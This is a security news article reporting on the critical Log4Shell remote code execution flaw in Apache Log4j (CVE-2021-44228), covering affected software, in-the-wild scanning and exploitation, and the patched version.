Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk

The Apache Software Foundation has released fixes to contain an
actively^[1]
exploited^[2]
zero-day vulnerability affecting the widely-used Apache Log4j
Java-based logging library that could be weaponized to execute
malicious code and allow a complete takeover of vulnerable
systems.

Tracked as CVE-2021-44228^[3]
and by the monikers Log4Shell or LogJam, the issue concerns a case
of unauthenticated, remote code execution (RCE) on any application
that uses the open-source utility and affects versions Log4j
2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in
the CVSS rating system, indicative of the severity of the
issue.

“An attacker who can control log messages or log message
parameters can execute arbitrary code loaded from LDAP^[4]
servers when message lookup substitution is enabled,” the Apache
Foundation said^[5]
in an advisory. “From Log4j 2.15.0, this behavior has been disabled
by default.”

Log4j is used as a logging package in a variety of different
popular software^[6]
by a number of manufacturers^[7], including Amazon, Apple
iCloud, Cisco^[8], Cloudflare^[9], ElasticSearch, Red Hat^[10], Steam, Tesla, Twitter,
and video games such as Minecraft^[11]. In the case of the
latter, attackers have been able to gain RCE on Minecraft Servers^[12] by simply pasting a
specially crafted message into the chat box.

Exploitation can be achieved by a single string of text, which
can trigger an application to reach out to a malicious external
host if it is logged via the vulnerable instance of Log4j,
effectively granting the adversary the ability to retrieve a
payload from a remote server and execute it locally. The project
maintainers credited Chen Zhaojun of Alibaba Cloud Security Team
with discovering the issue.

A huge attack surface

“The Apache Log4j zero-day vulnerability is probably the most
critical vulnerability we have seen this year,” said Bharat Jogi,
senior manager of vulnerabilities and signatures at Qualys. “Log4j
is a ubiquitous library used by millions of Java applications for
logging error messages. This vulnerability is trivial to
exploit.”

Cybersecurity firms BitDefender^[13], Cisco Talos^[14], Huntress Labs^[15], and Sonatype^[16] have all confirmed
evidence of mass scanning^[17] of affected
applications in the wild for vulnerable servers and attacks
registered against their honeypot networks following the availability^[18] of a proof-of-concept
(PoC^[19]) exploit. “This is a
low skilled attack that is extremely simple to execute,” Sonatype’s
Ilkka Turunen said.

GreyNoise, likening the flaw to Shellshock^[20], said it observed malicious activity^[21] targeting the
vulnerability commencing on December 9, 2021. Web infrastructure
company Cloudflare noted^[22] that it blocked roughly
20,000 exploit requests per minute around 6:00 p.m. UTC on Friday,
with most of the exploitation attempts originating from Canada, the
U.S., Netherlands, France, and the U.K.

Given the ease of exploitation and prevalence of Log4j in
enterprise IT and DevOps, in-the-wild attacks^[23] aimed at susceptible
servers are expected to ramp up in the coming days, making it
imperative to address the flaw immediately. Israeli cybersecurity
firm Cybereason has also released a fix called “Logout4Shell^[24]” that closes out the
shortcoming by using the vulnerability itself to reconfigure the
logger and prevent further exploitation of the attack.

“This Log4j (CVE-2021-44228) vulnerability is extremely bad.
Millions of applications use Log4j for logging, and all the
attacker needs to do is get the app to log a special string,”
Security expert Marcus Hutchins said^[25] in a tweet.